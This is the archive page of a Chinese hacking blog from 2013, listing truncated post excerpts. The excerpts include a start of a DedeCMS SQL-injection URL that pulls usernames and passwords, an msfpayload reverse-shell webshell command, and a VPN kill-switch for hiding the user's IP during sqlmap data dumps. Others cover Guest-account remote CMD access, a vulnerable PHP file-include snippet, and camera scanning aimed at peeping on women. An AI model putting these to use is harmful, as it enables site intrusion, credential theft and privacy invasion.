本博客只做技术文章、工具的收藏!

feed订阅 新浪微博 你好,欢迎光临! 

Category Archives: 技术文章

MacOS/Ubuntu等Linux通用的检查VPN脚本

2013.03.29 , , No Comments ,

MacOS/Ubuntu等Linux通用的检查VPN脚本,当VPN断线了自动关闭网卡。 问:什么时候会用到? 答:例如sqlmap在半夜dump数据的时候,你在睡觉,VPN断掉了,啊哈哈哈,全是真实IP去DUMP,好玩吧。 原理:ping vpn网关,ping不通N次,则shutdown掉网卡接口。 使用方法,新建一shell脚本,如check.sh ,给执行权限,使...

[转]远程调用CMD小结

2013.03.12 , , No Comments ,

看见最近大家讨论远程调用cmd比较热,所以就想写一下自己使用远程调用CMD的一些小结 主要细节请参考 http://lcx.cc/?i=3221 我以windows 2003系统做演示. 1.激活本地Guest账号 2.在组策略中将 网络访问: 本地帐户的共享和安全模型 改为经典 (2003系统默认为经典模式,不用修改) 3.开启server服务,server...

搞dedecms站 找后台的一些经验

2013.03.4 , , 1 Comment ,

首先: 注入exp 有时候 有些 /plus/目录换成了 /plugins目录 /plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd...

列工作组计算机ip的bat脚本

2013.02.21 , , No Comments ,

@echo off setlocal ENABLEDELAYEDEXPANSION @FOR /F "usebackq delims=, " %%J IN (`net view /domain ^|find "命令執行成 功" /v ^|find "The command completed successfully." /v ^|find "命令成功完成" /v ...

用 C# 实现18位身份证的验证

2013.02.20 , , No Comments ,

在实际工作中我们经常会用到对身份证进行验证的操作,比如员工档案中身份信息的管理等等。长达18位的数字谁也不敢说每次都能绝对的输入正确,如果能对输入的身份证进行一下验证的话,会最大限度的保证资料的正确性。 接着我们来说说18位身份证的结构吧,大体可以吧18位的数字分为两个部分,前17位表示的是身份信息,也就是哪个省、哪个市,以及出生年月等等,最后一位也就是第18位是效验...

Web漏洞实战教程(DVWA的使用和漏洞分析)2013完整版

2013.01.25 , , No Comments ,

点击下载 转自:https://forum.90sec.org/thread-4902-1-1.html

[转载]一点密码破解的心得(更新字典)

2013.01.18 , , 1 Comment ,

其实主要是来科普下hashcat系列的,如果用过的就撸过吧。 Hashcat-plus是目前我见过的支持算法最多的GPU破解工具,支持Windows和Linux。另外带了Jumbo补丁的John貌似也不错,没怎么用过,不发表评论。 Hashcat系列有3个版本,这也是很多人一开始容易搞混的地方。三个版本分别是hashcat、 oclhashcat-lite和oclha...

Metasploit 之使用socket通信的webshell简单分析

2013.01.10 , , No Comments ,

0x01 前言 常规的webshell都是调用该语言中习惯函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。 常见的脚本语言asp,php,jsp,都可以实现对应的socket编程。例如使用msf中: msfpayload php/reverse_php LHOST=自己的IP LPORT=端口...

视频监控!=安全

2013.01.7 , , 4 Comments ,

前言: 有次在群里见一基友发了张监控的截图,说是扫韩国路由扫到的。。。 小菜便萌发了偷窥妹子的想法,所以有了此文 0x00 什么是视频监控? 视频监控是安全防范系统的重要组成部分,它是一种防范能力较强的综合系统。视频监控以其直观、准确、及时和信息内容丰富而广泛应用于许多场合。近年来,随着计算机、网络以及图像处理、传输技术的飞速发展,视频监控技术也有了长足的发展。 详见...

php包含那点事情

2013.01.5 , , No Comments ,

有空就多整理下曾经研究过的知识和需要温顾的知识,明年可能去寻工作络. 关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的...不过 大家都懒得测试,我就来整理下. 1.普通本地包含; <?php $query=$_GET['p']; include($query); ?>...